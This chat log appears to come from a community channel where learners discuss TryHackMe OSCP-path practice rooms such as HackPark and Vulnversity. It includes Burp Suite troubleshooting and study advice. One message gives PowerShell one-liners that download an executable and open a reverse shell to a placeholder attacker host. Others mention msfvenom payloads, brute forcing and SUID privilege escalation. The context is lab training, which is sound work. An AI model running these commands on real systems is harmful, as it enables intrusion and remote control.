Can someone help me on the HackPark box. I'm at the Hydra part and I'm pretty sure what I have is correct, however I am getting multiple results back. I've taken a look at the write up and tried to compare what I have, which looks identical.
if u r brute forcing http it can be a good idea to push the packets through a proxy such as BURP
that way you can inspect the request and response
If anybody is looking at working on hackpark together let me know, I am hitting a wall on the hydra command
FYI it seems OffSec added a new rule that you can't use screen recorders (like OBS) during the exam https://www.offensive-security.com/faq/#screen-recording
Does anyone know about the nagios unauthenticated rce?
Did anyone else have a problem on Alfred with the last step of switching shells? Having a problem executing my exe payload and not sure why.
sorry i didn't get the blogs posted
had irl stuff to deal with
will try get them out this week
@frail vine whats your blog link? looking to add some more blogs to my rss
nvm think i found it
@strong jetty did you figure out Alfred? I had issues as well originally
@grim pendant https://www.pwndefend.com
@strong jetty my blog goes into this i think
No could not get the last bit working. Thanks UK_daniel_card I had a look at your blog and may just follow your steps. As far as I can tell everything I am doing is correct, I don't get any errors from the console so not sure.
@rustic walrus we don't have nagios. do we?
OffSec posted a new FAQ for PWK/OSCP :)
its official I have pressed the super panic button. exam on 28th
Has anyone done HackPark the intended way ? The write up uses another method but Im trying the intended way and its not working as expected.
@burnt walrus we have a nagios login panel, I was looking for some exploit, so found that there's an rce. But it was the updated one and later I got to know that it was a rabbit hole
Lol
We all fall in to rabbit holes
Should write a guide. Rabbit holes survival for 24 hours
anyone around have a question
just ask the question
I have tried this method in hackpark. but doesn't work. tried running as Administrator giving password still didnt work. thnx for the help
Hello all! I see that the brainpan room has been made private. I already rooted it on my private labs but is that normal ?
Anyone did vulnversity?
I'm doing the first Burp Suite module but there's a difference between what I'd see and what I really see on my burp
so I can't complete the module
someone can help me?
has anyone done hackpark the proper way?
@burnt walrus - This is the method I was trying but I could not get it working.
Yea I haven't seen anyone who has done it
So no one has actually done it that way I guess
Feels like I wasted so much time
I don't think so but that's the intended way as far as I am aware.
Yea well couldn't get in.
Hey hi @burnt walrus
yo
why when I use manual proxy I'm not able to access any website?
What kind of proxy @fathom rapids?
@chrome valve I followed the guide, so I set manual proxy with ip 127.0.0.1 (loopback) and port 8080. after this the proxy refuses the connection. so I can't complete the task.
This will be a burp proxy then? For Burpsuite?
yes
Ok, is Burpsuite open?
Kinda. If Burpsuite is open and your intercept is on then you won't be able to access any websites without manually forwarding the requests through Burp
If Burpsuite is closed and your proxy is on then it just won't work at all
oook I got it, thank you so much. oh, last question. when I try to navigate to the DVWA site as the task requires, burp intercepts and shows security=impossible, while in the task it shows security=low
do you know why or can I just go on?
Hmm, can you show a screenshot?
sure, thank you so much
@fathom rapids apologies -- got sucked into a piece of pseudocode
You should be able to just ignore that
Let us know if it causes any problems though
so no one really did hackpark intended way?
can anyone DM me about why the hackpark intended way isn't working?
and how they did it?
@hasty sentinel if you find out let us know about it too
I'll test it today/Tomorrow and confirm to you all if it works :)
alright best of luck i tested it and didnt work
Hmm. What are you trying to do with it?
sorry for the stupid question, does a sniper attack have to test every single word in the wordlist or should it stop when it finds the right one?
Hmm. Good question actually. My instinct says that it will keep trying, but don't quote me on that.
I'll do some tests later
I'm testing just now, I thought it had to stop, I'm letting it try all words now. I'll tell you after it finishes. thanks
btw, the right one is "password" and it is going on. so the options are 2: either my attack is not working or it has to test all
the workaround for hackpark doesnt even work for me
bruteforce works
yea sorry that doesnt work
maybe the one who made that box is the only one who did that the intended way
yea the only problem i have when i do it the intended way is that the service isnt getting called again like its supposed to
yea same here
someone need to fix that box or just give a straight guide how it is done
yep
even the next box is like that
steel mountain
anyone who did the intended way
cause the root shell is dying
i havent done that one yet
im doing that one
sorry what is the score rule?
dont wanna think about it
@burnt walrus sure i was just curious. i have so few time to think about it
can someone gives me some hint for snipeR?
I test the php extension list and all have response 200, so all should be ok. and i can assume that all extensions are admitted right?
@fathom rapids change the payload to include the "." (example: .php), check the Status and Length response
@hasty sentinel got it?
sorry for the delay - been on a bunch of flights
will get back to you later today :))
ok
what issues are you all getting with HackPark
I managed to get it working the intended way
actually wait lool
ok
oh and also blue steel
even that one Im facing issues
in the priv part
sorry steel mountain
thnx
@robust loom yeah I tried already, all status responses are 200, so they would be right. length 737. I can't understand where I'm doing wrong. stuck on that for 1 entire day
can you help me?
here there's a screenshot
don't got the notes right here but recognize it as I had the same issue
let me check it out
thanks so much
btw I removed the "." before extension cause with the dot I see this request:
Content-Disposition: form-data; name="file"; filename="shell%2ephp"
in any case it gives me response 200 .-.
and you "tagged" the ".ext"?
which box is this?
the name
found the box
@fathom rapids uncheck the Payload Encoding option in the Payloads tab
oh thanks, unchecking the encoding option it appears in the right way. btw all extensions give me response 200,
so I m missing something probably
did you receive other responses?
Check the Length value, but yeah the status code is the same for all
length is the same for all, but if the status code is the same for all how can I know which extension is allowed and which not?
verify your payload marker and payload list
ok analyzing all headers I see the only one that has a different content-length is .phtml. so I guess it's the right one. btw if we have a long payload list this process could be very time-wasting
only if you don't have pro version
and in the oscp exam we can't use the pro version
the community edition is limited by throttling the speed
true, so my guessing is that you would not need a lengthy list
btw @robust loom thank you and sorry if I wasted your time today
thank you again
can somebody help me with HackPark?
I can't get reverse shell if I wanted to
ps1 download, exe download, exe over samba...
I mean upgrading from standard netcat one to metasploit
@robust loom sorry man I'm stuck again on the same box on priv esc
@wraith echo try to take advantage of msfvenom to create a reverse shell executable
hey dark
@robust loom all of those above are msfvenom ones
I even tried unicorn to generate one
payload downloads/executes, just reverse connection does not come back
you can use ps to download files
or just invoke a reverse shell
powershell "(New-Object System.Net.Webclient).Downloadfile('http://your-ip:your-port/rshell.exe','rshell.exe')"
• Reverse shell (on your machine)
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
from a shell that is
use msfvenom to create a reverse shell executable and then trigger that
@robust loom please read carefully what i wrote
you need to find the correct payload
which payload?
I even have correct payload, because I tried to replicate writeup (after 6 own tries)
hum?
so instead of using a netcat listener, you could use metasploit (yeah I know we want not to be dependent on it) to catch the reverse shell call and then migrate to meterpreter from there
sometimes boxes get f-ed up because multiple people may pwn them
I restarted it X times, I don't think its that
any hint on priv esc for vulnuniversity?
@fathom rapids enumerate enumerate enumerate
i want to follow his path, so i want to escalate by /bin/systemctl
find the processes that stick out and learn how to use the command
@fathom rapids https://gtfobins.github.io
gtfobins is a gem
Have you seen the terminal app for it @robust loom?
Best thing ever invented
yeah saw it not so long ago, just haven't tested it yet
Fully recommend
but bookmarked it as fast as I could
I guess it makes some noise if you want to be as quiet as possible?
It literally just searches the gtfobins database. Shouldn't matter how noisy you are.
Unless we're on about different apps here
this gtfobins is useful for priv esc in my case?
na just if it makes a lot of traffic and you can't afford to be "caught", some CTFs are that way
Honestly, I would imagine that it's probably less noisy than just searching the website for the exploit in your browser
Yes, @fathom rapids
@fathom rapids find any suid/sudo binaries and check it out
i found them already, but after that I don't know how to proceed
I don't want the solution to be clear
if you're on windows then LOLBAS is the alternative
@chrome valve nice
@fathom rapids search for the binary at gtfobins site and try out the suggestion(s)
you'll learn more from that than anyone telling you how to do it, promise
i'll check it, thank you so much again
you learn by try, fail, try-again (x times) and succeed
Just for the record as well, I have it on good authority that the privesc on this box is purposefully chosen because it's sketchy. It was the creator's way of testing to see if beginners had the determination to not give up and just keep trying slightly different things until something works.
In other words: don't give up, you'll get it eventually!
the important part after each box is to reflect, what, why and outcome...and can it be used again... build up your methodology and replay
^^ and write everything down, then condense notes later. Eventually you'll have a massive notebook full of useful information
yeah always note down what you see/find even if you don't think it matters, you can always clean up later
one thing I've learned is, time manage your rabbit holes, if you don't find anything after like 30min then go through your notes, enum some more and try again
the only thing I'm having difficult in is the overthinking, the magic is KISS (keep it simple stupid)
...
anyone know how to change the ip after sqlmap has finished so I don't have to re-run after a "box" has changed ip?
flag2
@wraith echo there is a problem in that box. they are checking it
for those who've had issues with HackPark, the public exploit wasn't supposed to work
the room was created so users utilise a variant of the public exploit (if that makes sense)
i've added a hint + extra question on the privesc section to make this clear
let me know if anyone has more issues
hi all, i'm in the Alfred room, but i can't find root.txt in folder "C:\Windows\System32\config". anyone please help me with this. thanks
@queen bridge try searching for it dir /s *term*
some hint on escalation of vulnuniversity
Were you not working on that yesterday @fathom rapids ?
yeah but it was night in italy and after one hour i stopped. i'm working on it again for 3 hours now
Ah, fair enough
Just in case I was mixing people up
DM me with what you've tried so far? I'll give you a nudge in the right direction
going crazy on priv esc of vulnuniversity
@fathom rapids DM if you need any help
Did anybody have trouble with getting the proper OS version on vulnversity? I'm sitting here scratching my head, I dont usually have this problem
Nevermind, I'm tired...I forgot to run EVERY type of scan and finally found the one that gave a more concise answer lol
If u want to get the version u can just run 'systeminfo' command
@chrome valve whats the name of this cli gtfobins program? Can u give a github link I couldnt find it xd
There you go @dire jolt:
https://github.com/mzfr/gtfo
ty
so been struggling to get initial sh on Daily Bugle, and when I finally got it the rest was too quick
now the pain starts, BOF
Anyone done Brainstorm?, have a question regarding #2.
I'm trying to do the last part of vulnversity and cant get the privesc to work properly. When I go to enable to $TF it says the job failed because the control process exited with an error code. But then when I try to look at the details of the error, it wont let me because I dont have the correct permissions. Can anybody help me out with this?
@grave patio DM me the exact code you used -- I'll give you a hand with it.
hey guys, would like to ask how is the OSCP path, is it good? thinking about subscription
@mystic forge, in general or on THM?
general
@maiden aurora
i mean TryHackMe* sorry
i know oscp is kinda hard but im already having some experience, just looking for something before HTB oscp-likes boxes
and some people on reddit recommended tryhackme and this specific path
just wondering if its good, and worth to pay $$ for sub
Definitely worth the money if you are looking to get your OSCP cert
Definitely worth paying for the sub @mystic forge. The quality of boxes on TryHackMe tends to be really good, and the OSCP path is very popular. If you don't like it then it's less than a tenner for the month, and you would otherwise be spending a lot more.
Worth the shot at the very least
perfect, will order
do you know if I can add my debit card details, purchase the 3 month sub and then delete my card details? I know its safe but I'm trying to avoid at any cost providing my card details anywhere
If you are looking to get a 3 month sub, you could use PayPal
Vv welcome
Is that you just started Cherryblossom by the way @maiden aurora?
Yeah, why?
Have fun
I'm looking for ten roots before I release the write-ups. Do us a favour and give us another one.
It's a lot of fun so far Muirland
Also, I've been considering adding more hints in, so any feedback there is much appreciated
That's great to hear @hidden rivet!
@chrome valve Mind if I DM you a quick question regarding cherryblossom?
Sure - go for it
@chrome valve do you remember where flag2.txt is in Blue? I searched everywhere and just caught 1 and 3
See if you can find where Windows stores its SAM database @fathom rapids
The flag should be there
@chrome valve thank you, btw how did you know that?
A) because I've done the box before, B) because it's in the hint to the question
@fathom rapids use the dir command to search for files
I found it after the suggestion, btw i was sure i'd searched in the config directory already
next time: dir /s *term*
I'm so struggling with bof, are there now guides for bof on the site?
@robust loom if you have VIP i threw together a guided windows box w/ vulnserver on it
not sure what the room code is, but its called;
Intro to Windows BoF
@mystic forge I'm doing the PwK right now and the oscp track on tryhackme is very nice when I want to take a break from it. They put the rooms together to break up the monotony of the amount of shit you have to learn in the PwK and its nicely guided. The oscp labs are completely open, no help.
@crimson flame thx mate, was on OSCP path, but had to break and started "Buffer Overflows"
@rigid gyro welcome mate
o7
Best way to upload a meterpreter shell payload once you already have a shell on a victim machine?
I'm starting to 2nd guess my thought process because I'm so tired, but just curious how people do this. Pretty sure there a few different ways
@robust loom it's a windows server 2012 machine. So I guess I can use powershell to download wget from my attack machine and then use that to download my meterpreter payload but I was wondering if I'm overthinking it and maybe there is an easier way.
yeah PS on windows. try the simple methods first if it's blocking outbound connection
if it's not
but instead of netcat listener your could use a metasploit listener instead
@robust loom yeah. I think the easiest way would be to just setup a meterpreter listener and run the exploit again, but I was using this as a learning moment to make sure I knew how to transfer a file (new meterpreter shell) and run it from the victim machine. I'm gonna try the PS route and see if that works.
Sounds convoluted when I reread what I just said, but I think I'm making sense
that's the way to think :), try, fail, retry - LEARN
@grave patio no need to download to download, just download the payload using PS (re: "So I guess I can use powershell to download wget from my attack machine and then use that to download my meterpreter payload")
@robust loom omg...derp. I took a break, ate some food. Now I'm feeling more awake, back to it haha thanks for adding that
@crimson flame sorry, but can't find the room, is it removed?
found the banner through google
ask Skidy
On the vulnversity room, when attempting the Intruder attack, shouldn't the sample wordlist drop the dot "." from the extension names? I couldn't get that attack to work until I did....if this has been brought up already then never mind